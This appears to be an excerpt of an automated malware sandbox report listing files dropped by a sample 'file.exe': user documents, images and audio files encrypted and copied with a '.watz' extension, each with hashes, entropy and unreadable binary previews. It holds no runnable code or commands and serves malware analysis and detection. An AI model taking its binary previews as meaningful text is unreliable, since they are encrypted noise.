..]/E.Z.9......;.....W.-.N1z..^W6E-..'......s.....,..+..^.\.M:Jd..C.0.+..[.-..%..Q..Up.....y....O.C......"..bSUc0>....A.h.P.a.-....hD.ON.WE...H..e.6.....j..R...8.6.....e.N.Wj..h.K...Av...Xx....xOOp...xnqc(.*.V."...#>.{k.....j..g~.'fdR/..<]...~j.v..8.g.\|..A.4K......g7X;.p..c.:.....pK4...y._&..FZ^..E/..d.A.=..%g...!ab...`.M.l....#...u,.M3....w.S-eW._].].#.e....yYgz....&.A...........2.<K

C:\Users\user\Documents\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.818876961878813
Encrypted:	false
SSDEEP:	24:oXqM/Ye0xRloLsdPOqE6syPQv3xiUrwxZWuo9sRPLARybhQCWpJDbD:oaM/euUcG4fxiedL9CEobKCkJXD
MD5:	4A05B089C68BEC2E4B06F8C83F301134
SHA1:	20BA6FF084E87617EED98AF95FBE5B3802778CB7
SHA-256:	F9C13A5EC719499390A89FBFD2BF81A90C0CF33F5C8364ED0692BD493E13CBCD
SHA-512:	43398910DD9A10B33BA89C2660A0982C2255CC1587987B88D409F892A18F22780C7349B95001AF54DCC6DD30476DB4DC87A3FD352911460BE214A82F49E31E34
Malicious:	false
Preview:	NWTVC.[(.3#......-.o...rW...T..Y...G....e...9....{..)1..h.G...m.:..%..B.L.....ce.F_x}`8.\|`...{..tN..5.X3m.O.!V.6.....{5!~N...c....l....}.(..oN....A._....!i.(n....]..Ri{......!G....-..v.h./E.#...2AW..P......1F/H.M..;...].....<...F...I}K.K..07.e.<...HM.m....#T7\|v.%E...i..;&...n...2.T.d_.w.Y..x#,....OC..K.7.jW....a......QL....Kn.?D."X:...\.....yd.<3+.B`.e....@64.....<6.8.I..hF...-i.A5..#<gM...X.@t~.......Qof.abL..~Y.1..l:J..A.=...v.g?.d.rM....!...VV.'L..I....?M.u.0..p_..........o>.<.2..;G..K...Ou..v.......~.76..p.c.....c.+...'hR.O....X.TP..nA..m.x........XDh.5..0.7..1/m~>....a.D...0...r.u....y-...,.GS..F..t..../."...e.y....EI.w......x..A.s!.I....G..~[....(.dh.Z.K~....._:]?P.0DZ_.<B%...u..J.a.'M...../.&...S....'.....u.gU...{..}.-]=..}z...4.....#w.=a.10.w.?6lE...\L..IF.N....h?O..0..Y..r..i..<._9!..{_...m.f...sX..Z.....So...Zz.N`).S....ZU..:&O..E'..\|.........'...V..Cx.}..x.g;DA.W.\.Nm.M..B...J.,]....zA......?.[...3..R..&..E.:..0E..i.O.

C:\Users\user\Documents\NWTVCDUMOB.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.818876961878813
Encrypted:	false
SSDEEP:	24:oXqM/Ye0xRloLsdPOqE6syPQv3xiUrwxZWuo9sRPLARybhQCWpJDbD:oaM/euUcG4fxiedL9CEobKCkJXD
MD5:	4A05B089C68BEC2E4B06F8C83F301134
SHA1:	20BA6FF084E87617EED98AF95FBE5B3802778CB7
SHA-256:	F9C13A5EC719499390A89FBFD2BF81A90C0CF33F5C8364ED0692BD493E13CBCD
SHA-512:	43398910DD9A10B33BA89C2660A0982C2255CC1587987B88D409F892A18F22780C7349B95001AF54DCC6DD30476DB4DC87A3FD352911460BE214A82F49E31E34
Malicious:	false
Preview:	NWTVC.[(.3#......-.o...rW...T..Y...G....e...9....{..)1..h.G...m.:..%..B.L.....ce.F_x}`8.\|`...{..tN..5.X3m.O.!V.6.....{5!~N...c....l....}.(..oN....A._....!i.(n....]..Ri{......!G....-..v.h./E.#...2AW..P......1F/H.M..;...].....<...F...I}K.K..07.e.<...HM.m....#T7\|v.%E...i..;&...n...2.T.d_.w.Y..x#,....OC..K.7.jW....a......QL....Kn.?D."X:...\.....yd.<3+.B`.e....@64.....<6.8.I..hF...-i.A5..#<gM...X.@t~.......Qof.abL..~Y.1..l:J..A.=...v.g?.d.rM....!...VV.'L..I....?M.u.0..p_..........o>.<.2..;G..K...Ou..v.......~.76..p.c.....c.+...'hR.O....X.TP..nA..m.x........XDh.5..0.7..1/m~>....a.D...0...r.u....y-...,.GS..F..t..../."...e.y....EI.w......x..A.s!.I....G..~[....(.dh.Z.K~....._:]?P.0DZ_.<B%...u..J.a.'M...../.&...S....'.....u.gU...{..}.-]=..}z...4.....#w.=a.10.w.?6lE...\L..IF.N....h?O..0..Y..r..i..<._9!..{_...m.f...sX..Z.....So...Zz.N`).S....ZU..:&O..E'..\|.........'...V..Cx.}..x.g;DA.W.\.Nm.M..B...J.,]....zA......?.[...3..R..&..E.:..0E..i.O.

C:\Users\user\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846278319936593
Encrypted:	false
SSDEEP:	24:AEEdD4pdml8c4XYdRocGFkO/umYiEik7I0+McCUqG6VHlzfSUsbD:ZE2eeZXSRocGFkO/uZ7IzCUC9ljSUmD
MD5:	D8793E56F0ABAB8FAAA23C7BDA1BFDC0
SHA1:	F0840171B02E03D489E5A8EEC247AA90BE1C3114
SHA-256:	1E506E37E2475D13105CFFB9CF02ABCC50284BF294BB129231FFE5997FBB7BA3
SHA-512:	CD4DEE81791172B842944E291B6B020A27E0BA4A8927DF7D272F3141A0AB08C325AF68A26E11905F72DBC87CA804F47B3F10544609565CB6FBB29C4A80AA9772
Malicious:	false
Preview:	ONBQC[...;.o...K@.c.m2.(..Ki....^....k..Y..@S.^.Sh.6hVi......b.XbH`b...U.G..? .C....1..A.< .QH.-.D...h..J%...c.....K8.U.....Q...0...8..vb..l6..b..x]......OB..Q.\x.....g7..-.0.j}..../......\|...0.".......p.s....z.}...`.X..c+...=H.>Z......._.bNy....=..'{......w.d.6.......lx.#.o.F...Z2l....3(..p..o...^v...`. <...u...9/f..B...%.."%ip.F..]....R..V.(A.m........T.....g..E.MIuy[.Py{.Nn.:G..G>%J ...6..9.R..`..:.5....n.\...<....MG.f.v$T4.t.i...~.:.:.AM....$.>..i.........`.?ux-...a.1#..3...i?5.B.p..n.E..N....^.D..3..[.....o.]..Vc.d.J1......k@Z..q...B...m$.m.......W)c.5.....-ww1.Ff....1.eN.l.O.?J...].z...Q.R,.g".....q..Yz.A.-...v.....LD.4`l..Z.x.`...d.]..%.B..,..C.O.{/L...-..& ......y.Q.tA..x..uO.....J5...k.h.K......~..[.f\|..K.....NV..fi..(.9k..:.bT5...M...?..W....G...W..-......AO..Ut.'#.3.....T...!.5.e.'...x..]...C0..,.<)1.y-.`....[...F.,my.w@....Al.^..H....:.w.C9*N.......F. .....K...i'_...S,.].B.d.e.... .C...Ssu./.....`.B5.7.Ag..Q5.{...O.

C:\Users\user\Documents\ONBQCLYSPU.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846278319936593
Encrypted:	false
SSDEEP:	24:AEEdD4pdml8c4XYdRocGFkO/umYiEik7I0+McCUqG6VHlzfSUsbD:ZE2eeZXSRocGFkO/uZ7IzCUC9ljSUmD
MD5:	D8793E56F0ABAB8FAAA23C7BDA1BFDC0
SHA1:	F0840171B02E03D489E5A8EEC247AA90BE1C3114
SHA-256:	1E506E37E2475D13105CFFB9CF02ABCC50284BF294BB129231FFE5997FBB7BA3
SHA-512:	CD4DEE81791172B842944E291B6B020A27E0BA4A8927DF7D272F3141A0AB08C325AF68A26E11905F72DBC87CA804F47B3F10544609565CB6FBB29C4A80AA9772
Malicious:	false
Preview:	ONBQC[...;.o...K@.c.m2.(..Ki....^....k..Y..@S.^.Sh.6hVi......b.XbH`b...U.G..? .C....1..A.< .QH.-.D...h..J%...c.....K8.U.....Q...0...8..vb..l6..b..x]......OB..Q.\x.....g7..-.0.j}..../......\|...0.".......p.s....z.}...`.X..c+...=H.>Z......._.bNy....=..'{......w.d.6.......lx.#.o.F...Z2l....3(..p..o...^v...`. <...u...9/f..B...%.."%ip.F..]....R..V.(A.m........T.....g..E.MIuy[.Py{.Nn.:G..G>%J ...6..9.R..`..:.5....n.\...<....MG.f.v$T4.t.i...~.:.:.AM....$.>..i.........`.?ux-...a.1#..3...i?5.B.p..n.E..N....^.D..3..[.....o.]..Vc.d.J1......k@Z..q...B...m$.m.......W)c.5.....-ww1.Ff....1.eN.l.O.?J...].z...Q.R,.g".....q..Yz.A.-...v.....LD.4`l..Z.x.`...d.]..%.B..,..C.O.{/L...-..& ......y.Q.tA..x..uO.....J5...k.h.K......~..[.f\|..K.....NV..fi..(.9k..:.bT5...M...?..W....G...W..-......AO..Ut.'#.3.....T...!.5.e.'...x..]...C0..,.<)1.y-.`....[...F.,my.w@....Al.^..H....:.w.C9*N.......F. .....K...i'_...S,.].B.d.e.... .C...Ssu./.....`.B5.7.Ag..Q5.{...O.

C:\Users\user\Documents\ONBQCLYSPU\DVWHKMNFNN.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840783886905343
Encrypted:	false
SSDEEP:	24:Vhm26leKKa1dAWTG/UviB+0n5LoeQQaG+Q8hlVCuordfZLfbWbD:Vt6leHa1dAWSGiBp5LoeQmn1foD
MD5:	554D682065CDA013E8ABD707D33FE938
SHA1:	38F569564BF9E2B37CFFB3F916DBE6CC556A0152
SHA-256:	3C72B40FA2632EDA2CCCDC4E761F0BCF72DF265632EC7631E9A06E0661067A62
SHA-512:	06FE1C694C99A7A1A7C2A7A6BDEC48BF641E3479279D498351C7D58495BEF603DBF1E7FA08787D94341A357BA95C9BFE7F4E378017D5C609E3505EC62B2B2019
Malicious:	false
Preview:	DVWHK>.\.........E.X.O.....^/&.o.6B...."..B<...Gp..o.>m.RJM. .2....W.....h..^......T.....f.)..g.i.!/..>....S ..y.K.q......W$.......8..6...C.u.B....x....a..........M.3....\.L...0B.a22....7{v.e.ev.?:.....hk.BZ.n....t.?.js.D.......c.7...4.s....`.....;.7..#.U.+c..]..r.k<....4....G..Y$...;.....{Ol0?jkO.=F...\|.9. ..Q\.qx...j..8...`ki."..M6Q..`v.L..4-8......Ww;..9.=.....g.r...7Y2CC.Y7;..!P...T...~...U...WR...........AB0...S.9cy.-.G.~...............k<n..@....~L....n..V...Z.[V.^.........{J...K7c..W..O.][9...9;.};e.{.z.@.u.C...-...e.SS.q.o.X....,w..13..!....A.....f..d.C....T-.(.DE.>..%...{._..TP.`:.5L'..A...Lw....q8R....6..T.tN{..$.X.[.4.J.+.uL..~...(...g?../........,.{.s...#9G`~....`{...,IU\..J.E....{....R..B.p...Y.k.m.g.E&...+.s.LND ....ZB.w....9....,8...4........3.f...k..4..&DO.3W..\.......N.$.@6....J..Xx[..y.E.....I...J.......8.7:..$.J....2........Rw.@..>6.._.b"...........N..@...V..Z.;E...Yd.-...-8.Zt.?*...M=..x......k

C:\Users\user\Documents\ONBQCLYSPU\DVWHKMNFNN.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840783886905343
Encrypted:	false
SSDEEP:	24:Vhm26leKKa1dAWTG/UviB+0n5LoeQQaG+Q8hlVCuordfZLfbWbD:Vt6leHa1dAWSGiBp5LoeQmn1foD
MD5:	554D682065CDA013E8ABD707D33FE938
SHA1:	38F569564BF9E2B37CFFB3F916DBE6CC556A0152
SHA-256:	3C72B40FA2632EDA2CCCDC4E761F0BCF72DF265632EC7631E9A06E0661067A62
SHA-512:	06FE1C694C99A7A1A7C2A7A6BDEC48BF641E3479279D498351C7D58495BEF603DBF1E7FA08787D94341A357BA95C9BFE7F4E378017D5C609E3505EC62B2B2019
Malicious:	false
Preview:	DVWHK>.\.........E.X.O.....^/&.o.6B...."..B<...Gp..o.>m.RJM. .2....W.....h..^......T.....f.)..g.i.!/..>....S ..y.K.q......W$.......8..6...C.u.B....x....a..........M.3....\.L...0B.a22....7{v.e.ev.?:.....hk.BZ.n....t.?.js.D.......c.7...4.s....`.....;.7..#.U.+c..]..r.k<....4....G..Y$...;.....{Ol0?jkO.=F...\|.9. ..Q\.qx...j..8...`ki."..M6Q..`v.L..4-8......Ww;..9.=.....g.r...7Y2CC.Y7;..!P...T...~...U...WR...........AB0...S.9cy.-.G.~...............k<n..@....~L....n..V...Z.[V.^.........{J...K7c..W..O.][9...9;.};e.{.z.@.u.C...-...e.SS.q.o.X....,w..13..!....A.....f..d.C....T-.(.DE.>..%...{._..TP.`:.5L'..A...Lw....q8R....6..T.tN{..$.X.[.4.J.+.uL..~...(...g?../........,.{.s...#9G`~....`{...,IU\..J.E....{....R..B.p...Y.k.m.g.E&...+.s.LND ....ZB.w....9....,8...4........3.f...k..4..&DO.3W..\.......N.$.@6....J..Xx[..y.E.....I...J.......8.7:..$.J....2........Rw.@..>6.._.b"...........N..@...V..Z.;E...Yd.-...-8.Zt.?*...M=..x......k

C:\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867692459757652
Encrypted:	false
SSDEEP:	24:tJF0VvzT7b1lgzZYa2AWkQjNF6kj6uVyWCmkLe5dkcoVFQ8lXDy18eynNbD:tEdtXvb6k6dWCmkLuB4FQ2y1jytD
MD5:	1EB6CAB03C58F3008514427E4064D99E
SHA1:	EE1F52EC854A5F96B12A2AE7BDA21CC85F160772
SHA-256:	4DA94A096FF11E42E3EB2F49ABA2FAB51CC69FC15AD35A3AF603D283F7EE00ED
SHA-512:	83B047779842E1A9C4D79EA9C2B2644C44B0218313C15CE299064FF2631777DD92B6C1E49372050DE4D0B09637DC63F44DD80A6318E1910290004F485813A0A6
Malicious:	false
Preview:	HTAGV.<....t..>.c...`."..P..Be.......S.;.k%.M+h.M.c..+N}.@.MT&..,...B..l2..9.N".c^...U.f...c<.8.Pu.6%...zz.c+.~........M..`....9.v.p.-)l...\|...~a...t...7. ..I.7J..y....x.......3...i..%9ng;.S.=...N...l9...:..K.D...k..U...Oe..4....(.D...0;..7Y....$.4.........3.j...j+C..VV.....8.w....?.4."p.@..}.@.....UWH....e.G.S..GpT.6...[.........@.\..[#I.)..o...'.%%Y..w.J7...xV._jle...;.!........}<...2..Z....@M.,..u...0".B...s...r..~1.2...Bd.r..NR.C...........R.Sj...E............Q..UgY......\.\|.J.....(..K.B....'.Y...1...~.......d...@...$..\|X..'.....pSQ....;...nA..E....oJk=...M.\......s...:.Yt..m....M....TZaQ..o.B..yx...>r.[6.._.....,.<...o...=......4..v._.P.9"..'..=..l....u...j./...B.f...+.............sm..{K..2.$....&Y...H..oG.....lQ.A.r.j.k.\|.......t.+...%S..;.....)b.3V.G.;..Gm...K....o&.OX.5.'H....(p....0...i..C...MG...Oz',.....7...l..@.d....T5.,.Y^...t.........P...(F.C.a.......oB..C....x......P.':.02......}q.}....v...OV...........`.....

C:\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867692459757652
Encrypted:	false
SSDEEP:	24:tJF0VvzT7b1lgzZYa2AWkQjNF6kj6uVyWCmkLe5dkcoVFQ8lXDy18eynNbD:tEdtXvb6k6dWCmkLuB4FQ2y1jytD
MD5:	1EB6CAB03C58F3008514427E4064D99E
SHA1:	EE1F52EC854A5F96B12A2AE7BDA21CC85F160772
SHA-256:	4DA94A096FF11E42E3EB2F49ABA2FAB51CC69FC15AD35A3AF603D283F7EE00ED
SHA-512:	83B047779842E1A9C4D79EA9C2B2644C44B0218313C15CE299064FF2631777DD92B6C1E49372050DE4D0B09637DC63F44DD80A6318E1910290004F485813A0A6
Malicious:	false
Preview:	HTAGV.<....t..>.c...`."..P..Be.......S.;.k%.M+h.M.c..+N}.@.MT&..,...B..l2..9.N".c^...U.f...c<.8.Pu.6%...zz.c+.~........M..`....9.v.p.-)l...\|...~a...t...7. ..I.7J..y....x.......3...i..%9ng;.S.=...N...l9...:..K.D...k..U...Oe..4....(.D...0;..7Y....$.4.........3.j...j+C..VV.....8.w....?.4."p.@..}.@.....UWH....e.G.S..GpT.6...[.........@.\..[#I.)..o...'.%%Y..w.J7...xV._jle...;.!........}<...2..Z....@M.,..u...0".B...s...r..~1.2...Bd.r..NR.C...........R.Sj...E............Q..UgY......\.\|.J.....(..K.B....'.Y...1...~.......d...@...$..\|X..'.....pSQ....;...nA..E....oJk=...M.\......s...:.Yt..m....M....TZaQ..o.B..yx...>r.[6.._.....,.<...o...=......4..v._.P.9"..'..=..l....u...j./...B.f...+.............sm..{K..2.$....&Y...H..oG.....lQ.A.r.j.k.\|.......t.+...%S..;.....)b.3V.G.;..Gm...K....o&.OX.5.'H....(p....0...i..C...MG...Oz',.....7...l..@.d....T5.,.Y^...t.........P...(F.C.a.......oB..C....x......P.':.02......}q.}....v...OV...........`.....

C:\Users\user\Documents\ONBQCLYSPU\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841463304823898
Encrypted:	false
SSDEEP:	24:xRsweJsR185caAXZVI7cVciSgdjKHspZ093UpLZfWy5NXZM+/63TAA2dlbD:xqxc18CHXZm7KcibNpZ/BZpbAiD
MD5:	D34E47F20F202C81E4DCD5462303BB61
SHA1:	FD499716A6F1BEC4FFF2D5CAED60EB22248517E3
SHA-256:	C78CD22E74496695F3E8C7835FC3D83E23B50573C8670E7C9AB8080D98C9D6D4
SHA-512:	54D0152A39C5A07A1980E5616226616C00790A1ACA74B09A748861B6A8C431B63170CEAABBC3D3D1AE8E4F31DCDC2CD0209BE4325A998E373936EE287347396A
Malicious:	false
Preview:	KATAX?aa.e..42aD.;6h}...n.%p...f...k^.Ao../.\..:...;...7.w9..PU.h.X...g#[..F.I.,.y[...1.=).Y.8.<..~xd3y].....%.=...P.....3......N.....3.E.9....kL..,{..$..&..>.5.Z=.t.\|_.....PX.L.z...Dl..e.ox{.I9.......y1w...e.a....E.l......!....z.....t..9...h.c...c..yAp....,..o.]..1?.i...)..............[E.8.w%.B._t...%....o...a.Q.V........\.3v!/.....w..........{.o{6.\|.=...s....;'....7SO..[.....D2.+....}=.:...4.q~.0H%.@.S..]..{........)....z..E......+uT.?HE36.} )\Gac.....j..I.e.Z...{.z3...V...T\|.X..d..._.a-}.}O...P.q.!.-;.o".. .'[...V"......<......Po@...o/..9m. ...7>r...L..... .;E..X.......r.s..#.Il._#...zh1<X.=+..Y..fEk..RE..m.m..6o\|.$F...c.$b&..S.R.Dj>aM.x....?...dR;i...G.s.f.+...9...$!....d..A=B.........:}+w.....X...g@P..T.......R..f.e....J....aS.nM<d..'Z:......Z...#.1...U.........H.qnH#.>.9.......\.R=8......gm....h^.B.-..Z.....J.m..Q.v.y.@..n...C+S.H.y.!....4.7../.}.9o..k...T.R.~..o...v...[...t...e.....:".......ZA.l...N.H.]..j:...\<

C:\Users\user\Documents\ONBQCLYSPU\KATAXZVCPS.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841463304823898
Encrypted:	false
SSDEEP:	24:xRsweJsR185caAXZVI7cVciSgdjKHspZ093UpLZfWy5NXZM+/63TAA2dlbD:xqxc18CHXZm7KcibNpZ/BZpbAiD
MD5:	D34E47F20F202C81E4DCD5462303BB61
SHA1:	FD499716A6F1BEC4FFF2D5CAED60EB22248517E3
SHA-256:	C78CD22E74496695F3E8C7835FC3D83E23B50573C8670E7C9AB8080D98C9D6D4
SHA-512:	54D0152A39C5A07A1980E5616226616C00790A1ACA74B09A748861B6A8C431B63170CEAABBC3D3D1AE8E4F31DCDC2CD0209BE4325A998E373936EE287347396A
Malicious:	false
Preview:	KATAX?aa.e..42aD.;6h}...n.%p...f...k^.Ao../.\..:...;...7.w9..PU.h.X...g#[..F.I.,.y[...1.=).Y.8.<..~xd3y].....%.=...P.....3......N.....3.E.9....kL..,{..$..&..>.5.Z=.t.\|_.....PX.L.z...Dl..e.ox{.I9.......y1w...e.a....E.l......!....z.....t..9...h.c...c..yAp....,..o.]..1?.i...)..............[E.8.w%.B._t...%....o...a.Q.V........\.3v!/.....w..........{.o{6.\|.=...s....;'....7SO..[.....D2.+....}=.:...4.q~.0H%.@.S..]..{........)....z..E......+uT.?HE36.} )\Gac.....j..I.e.Z...{.z3...V...T\|.X..d..._.a-}.}O...P.q.!.-;.o".. .'[...V"......<......Po@...o/..9m. ...7>r...L..... .;E..X.......r.s..#.Il._#...zh1<X.=+..Y..fEk..RE..m.m..6o\|.$F...c.$b&..S.R.Dj>aM.x....?...dR;i...G.s.f.+...9...$!....d..A=B.........:}+w.....X...g@P..T.......R..f.e....J....aS.nM<d..'Z:......Z...#.1...U.........H.qnH#.>.9.......\.R=8......gm....h^.B.-..Z.....J.m..Q.v.y.@..n...C+S.H.y.!....4.7../.}.9o..k...T.R.~..o...v...[...t...e.....:".......ZA.l...N.H.]..j:...\<

C:\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855305688579793
Encrypted:	false
SSDEEP:	24:ceDveCTUKZ0KaC994BMq1hK4CfX2IEcR/vS8y0fAp/ZbqTnqLrVr+eEAbD:ceDvelKZ0akr144WbR/KJ0MBbqTqXV6M
MD5:	398C5F6E9BF2B94334E99BCB64F2165B
SHA1:	51919C282EE0CEA873CFFC3845611ECEAB042E74
SHA-256:	7AF98D88F61A61D8C482DAFA2ADA477AE1F5144C9392C63329148A56A2DD0BF7
SHA-512:	2CAD1BE99E0A8BC9ECE8DDE4F62B700B25CD3386F2860D6C9156D64AC56C8BD1FC96E14E70974E97275C51AC06DEFC19043C22AACBE1744A3652F3AC2544AEC4
Malicious:	false
Preview:	ONBQC....'...m.J...9l!.E.6s.$.<)..\K.p....K.H...?....<J..v}..P.....'#.,.....l+........sL.\.(.?7.=p..+I.l'5.t......Mtwvt.VGX.t......x...<;..n..,z.9E............w<.X...._:J\...t...i...m.......qmD2g....(.T....~?.....@...dR..>.F.t_HM>l.&.?..w~.#.....kG.`g.g...z.......K..,.Y.,CD.+[..N...=......8=~.t.f...86...d...HA......e...8....LeJ[....V..[./...G[.....d.\|..J.E^...R.&.....FJ..I..:c...)...E..]..W..].U..\M.`..3;.b......^$.c.c..G..9.. ._.TG.q8+.7.D-.@..9..-.1..?$....g.....im.?..txd.d......n.I.3.v..~.Y..4"..u...)...^..l..........>..(<..R.D.....hZ,s.f......X.u!.g.po...7..bs'./...T.....f..~[U.Q.6...`.P.5...6..EU.........{u..,..QX..k...7`.B.oXz.~.\|j.c...B..#E.D.}.\|..X..1]......lC(G...10d..\.P`..w6k.<.....HAj7}...........>VJ...N..%.$EW]...3'..;y.d@A3....B........~..8.]#.=.(..p.G..c.....DY.-m~[".........x}.G.6..,5p..4.i...[h...c.[..)...m.i...\|.q..\....)...d}..>m.....]...:`..U..`B../.2-).=.m!.{8b..Lz..!.{0....FzD....f.;..C."t...3.#...i..y....B..Z.;.

C:\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855305688579793
Encrypted:	false
SSDEEP:	24:ceDveCTUKZ0KaC994BMq1hK4CfX2IEcR/vS8y0fAp/ZbqTnqLrVr+eEAbD:ceDvelKZ0akr144WbR/KJ0MBbqTqXV6M
MD5:	398C5F6E9BF2B94334E99BCB64F2165B
SHA1:	51919C282EE0CEA873CFFC3845611ECEAB042E74
SHA-256:	7AF98D88F61A61D8C482DAFA2ADA477AE1F5144C9392C63329148A56A2DD0BF7
SHA-512:	2CAD1BE99E0A8BC9ECE8DDE4F62B700B25CD3386F2860D6C9156D64AC56C8BD1FC96E14E70974E97275C51AC06DEFC19043C22AACBE1744A3652F3AC2544AEC4
Malicious:	false
Preview:	ONBQC....'...m.J...9l!.E.6s.$.<)..\K.p....K.H...?....<J..v}..P.....'#.,.....l+........sL.\.(.?7.=p..+I.l'5.t......Mtwvt.VGX.t......x...<;..n..,z.9E............w<.X...._:J\...t...i...m.......qmD2g....(.T....~?.....@...dR..>.F.t_HM>l.&.?..w~.#.....kG.`g.g...z.......K..,.Y.,CD.+[..N...=......8=~.t.f...86...d...HA......e...8....LeJ[....V..[./...G[.....d.\|..J.E^...R.&.....FJ..I..:c...)...E..]..W..].U..\M.`..3;.b......^$.c.c..G..9.. ._.TG.q8+.7.D-.@..9..-.1..?$....g.....im.?..txd.d......n.I.3.v..~.Y..4"..u...)...^..l..........>..(<..R.D.....hZ,s.f......X.u!.g.po...7..bs'./...T.....f..~[U.Q.6...`.P.5...6..EU.........{u..,..QX..k...7`.B.oXz.~.\|j.c...B..#E.D.}.\|..X..1]......lC(G...10d..\.P`..w6k.<.....HAj7}...........>VJ...N..%.$EW]...3'..;y.d@A3....B........~..8.]#.=.(..p.G..c.....DY.-m~[".........x}.G.6..,5p..4.i...[h...c.[..)...m.i...\|.q..\....)...d}..>m.....]...:`..U..`B../.2-).=.m!.{8b..Lz..!.{0....FzD....f.;..C."t...3.#...i..y....B..Z.;.

C:\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838515382369164
Encrypted:	false
SSDEEP:	24:bXwjm7JDf2MoyDUrEYkmYi2uf8Awhe+fyaayXkSRKgcv3ytEv0bD:1JDOMLDUrEY0//OnyXBRKgcv3ytrD
MD5:	2180072B62042A43411A0C3BB7D1DC43
SHA1:	32CA9D955245BB3B5B4FDE0A215AF42BB4726B97
SHA-256:	8BCBB3F2728FDF0CC338E6B58AA0511500214B6562EBEBC882C2DA22E31EA94D
SHA-512:	181C39FD76DD287383CBBA745072B61C36F01480B5290DB01B0630D2866A5A2A937FD368BC1C8683CEEBB74C6917959E91D8175CB44B4B14BF8976633C724B7A
Malicious:	false
Preview:	UMMBD.c.........GH..EBG.6.....Z......H...b/oa:k.U9p..H..\|1..L.!...8!lcE.3...c.=QJ+...#R.... ...x......Z-.t./z...m..w_......H.7..$1%.U.0 .V.o.....Q...W.(.+.Br..r...`..55.^.Vgo....$.<.....].>H.z$...${\T.....^A..2.......r.}q.2.y+lg.mgW..../6 a+..X.z.......`....U....C..od.G...lM..R...-V.m.8...E<:.x...zs..'........%..>.7".k."Z.dn..I..Ar.9....L....O.vn#...'\p/.m.W....J.QQ../.;......"I.NM!.}:.x..un%r.<4......S2u..s}..6......(............C._.<....%v=....U............S...Tx.k.$.....;.!7..MU....,c..dA....q...[X8....,i_.Q5.o..a_...&$.....6...v.....U.8.5..J.....S..Oh!..... ..........2...:o.%......f........[.U...X.7......Q.J.XpQ..##kcphH..#;...[M}LY:.[...........>....U...{d........I[.. @A..Q{......Q.C..t?V....f..n.{,...]l_._Rq8..0C..8..!...C..~.....,S...../j.....o%'8.T.G.A!. ..[...........!...HJ.P....y{.....A.+.E....t.\M"...c...:yS1.d.]L..v..>k..BY....)]Z..W.qo..`..~..x.n.R."...d.EB.....m..-E-%..M.#....... ..`...m..JY.t./.C....ya....,.@.......~.u.s..

C:\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838515382369164
Encrypted:	false
SSDEEP:	24:bXwjm7JDf2MoyDUrEYkmYi2uf8Awhe+fyaayXkSRKgcv3ytEv0bD:1JDOMLDUrEY0//OnyXBRKgcv3ytrD
MD5:	2180072B62042A43411A0C3BB7D1DC43
SHA1:	32CA9D955245BB3B5B4FDE0A215AF42BB4726B97
SHA-256:	8BCBB3F2728FDF0CC338E6B58AA0511500214B6562EBEBC882C2DA22E31EA94D
SHA-512:	181C39FD76DD287383CBBA745072B61C36F01480B5290DB01B0630D2866A5A2A937FD368BC1C8683CEEBB74C6917959E91D8175CB44B4B14BF8976633C724B7A
Malicious:	false
